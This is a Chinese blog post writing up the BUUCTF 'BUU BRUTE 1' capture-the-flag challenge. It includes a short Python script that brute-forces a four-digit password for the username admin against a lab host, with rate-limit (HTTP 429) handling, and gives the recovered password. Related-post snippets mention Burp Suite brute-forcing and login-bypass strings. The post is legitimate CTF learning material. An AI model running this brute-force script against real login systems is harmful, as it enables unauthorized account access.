BUUCTF Basic 解题记录--BUU BRUTE 1

最新推荐文章于 2024-05-18 17:29:08 发布
最新推荐文章于 2024-05-18 17:29:08 发布
阅读量505 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43171033/article/details/132877609
版权

3、BUU BRUTE 1

这道题打开靶机后,我以为是关于SQL注入的内容,但是发现怎么都不成功。后面查看网络上的解题思路,主要有两种,一种是是用Burp suite暴力破解,一种是使用python脚本,不过两种对于用户名都是先进行了猜测后,发现靶机有明显的错误提示信息“密码错误,为四位数字。”,尔后对于密码的四位数字进行了破解。

我开始登录时就采用了常见的用户名 admin 进行测试,发展报了上面的密码错误信息。在只用Burp suite工具进行数字破解时,发现速度很慢,最终没有耐心等下去。  后续根据网上提供的python脚本进行测试,短时间内成果获取密码。

代码如下:

import time
import requests
#if __name__ == 'main_':
for i in range(1000,9999):
    print("破解到:" + str(i))
    ret = requests.get("http://8839c9b9-6d14-41d6-81c0-fb60072a0b13.node4.buuoj.cn:81/?username=admin&password=" + str(i))
    if 429 == ret.status_code:
        time.sleep(0.5)
        i = i-1
        continue
    if ret.text != "密码错误,为四位数字。" :
        print(ret)
        print("密码为:" + str(i))
        break

其中四位数字的取值范围可以在运行过程中分段该变。

429是因为在运行过程中会有429的错误码,导致没有得到正确的密码脚本就停止了,后面参考网上遇到429错误码让继续就可以了。

最终得到结果如下:

输入用户名/密码   admin/6490即可得到flag。

小白的小肉丸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
BUUCTF Brute 1使用BurpSuite爆破详解
热门推荐
bill_fang的博客
08-28 1万+
最近研究一下白帽子安全,主要关注WEB安全,在做完了常规的靶场xsslab、SQLI、DVWA、Pikachu后,了解了白帽子安全的基础知识。进一步开始用一些CTF来练习。本文是从BUUCTF网站上,去解一个WEB的Flag的详细记录。0x00打开BUUCTF,打开靶机BUUCTF的地址在这里:BUUCTF在线评测 (buuoj.cn),进入后选择Basic->BUU BRUTE1.选择B...
BUU BRUTE 1 优化解决方式
qq_40432713的博客
01-19 6022
题目 BUU BRUTE 1 简单fuzz后可知是一个四位密码的爆破,brupsuite或者脚本都可以解决。网上有很多简单的教学。 但是该题有一个问题就是会报429请求过多的错误。使用brupsuite线程开高了会触发报错,导致错过很多测试,线程开低的话速度又很慢。脚本的话速度就快很多了。参考了一下别人的脚本,但是他并没有处理429错误,于是这里改进一下: import time import requests url="http://23b71b6s-f202-4f59-9ab1-q19fcv1cda9
BasicBUU BRUTE
欢迎来到我的学习笔记薄
05-18 467
话不多说开整。
BUUCTFBUU BRUTE 1 1
qq_41369524的博客
12-08 1010
payload选择numbers,从0到9999(千万别写1000到9999,因为4位数字也包括0001之类的)攻击结果点击render可以看到响应包的渲染结果:从长度来判断,其他都是202,就admin是217.本题目名字brute意思是残酷的,暴力的。可以看出是get传参,并且是要我们填正确的用户名。发现遍历特别慢,靶机都过期了还没试出来。所以可以试试暴力破解来爆破用户名。等一会儿,成功爆破出密码:6491。首先试一下root/123456。所以成功爆破出用户名:admin。其他的都是:用户名错误。
BUU BRUTE 1(burpsuite爆破初学)
qq_45952875的博客
04-03 2043
(题外话,我的burpsuite一开始显示中文会出现方块乱码,找了一下解决方法,顺便知道了字号怎么改:Burp->Settings->User interface->Message editor->HTTP message display->Font改成DialogInput,字号在Size选)接着爆破密码,可以在Payload type把Simple list改成Numbers,也可以继续用Simple list载入0000~9999的字典,操作同上,找到密码查看Response得到flag。
BUUCTF -> Basic -> BUU BRUTE 1
m0_74940843的博客
09-24 278
找到返回长度异于其它payload的请求(在此实例中即为admin),响应页面。同样是找到长度不一样的,还是挺慢的,一个一个找好累呀。随便输入一个用户名和密码,用burp抓取数据包。在payload板块添加字典。发送到intruder。所以我们获得了两个信息。密码错误,为四位数字。
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
buuctf-BUU BRUTE 1
m0_74013288的博客
09-24 832
当我们知道用户的账号,但不知道用户的密码时,可以使用万能密码,同样,它也不是一个真正意义上的密码,而是一个【拥有不同变体的格式】打开靶机后,我们可以看见一个登录界面,随机输入账号与密码,显示错误,那么Brup Suite进行爆破,找到正确账号为admin。需要注意的是,以下所有万能账号中的 a 可以是自定义的数字或字母,比如 1,2,3,b,c,d。密码随便输入,比如 123456。万能密码的使用:用户名输入 【万能密码】,比如 admin’ #需要注意的是:万能密码中的 admin,必须是真实的用户名。
BUU BRUTE 11(解题分享)
TinFrog的博客
07-17 256
BUU BRUTE 11(解题分享)
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6152
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
爆破及BUUCTF->BUU BRUTE 1
2203_75773407的博客
10-30 167
爆破是通过大量的尝试来破解一些密码。
BUU BRUTE 1
qq_53386879的博客
08-05 288
打开靶场,就只有这玩意随便搞几个弱口令登录试试显示页面错误看着有点无从下手。
熟悉http和https协议、ip、网关、子网掩码、路由器 以及burpsuit熟悉爆破模块:BUUCTF -> Basic -> BUU BRUTE 1
xuanqwertyui的博客
11-04 531
2.默认网关地址是主机位除了最后一位全置1后得到的。假设现有一个ip地址为193.6.7.0/24,根据网络前缀24可知前24位为网络位,后8位为主机位,因此该网络的默认网关地址就是IP地址193.6.7.11111110(加粗的部分为网络位),换算成十进制数即193.6.7.254/24。一台主机可以有多个网关。默认网关的意思是一台主机如果找不到可用的网关,就把数据包发给默认指定的网关,由这个网关来处理数据包。现在主机使用的网关,一般指的是默认网关。
【极客大挑战2019】http(改包)和BUU BRUTE 1 (爆破)
m0_73770225的博客
11-27 1042
【极客大挑战2019】http(改包)和BUU BRUTE 1 (爆破)
BUU-Basic-BUU BRUTE 1
七堇年的博客
01-20 1507
BUU-Basic-BUU BRUTE 1
BUU BRUTE 1 1
09-18
BUU BRUTE 1是一个爆破任务,根据引用所述,首先尝试爆破用户名,可以选择一个适合的字典进行爆破。接着,根据引用所述,可以切换到密码爆破模式,使用适当的字典或数字列表进行爆破。最后,根据引用所述,通过查看...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值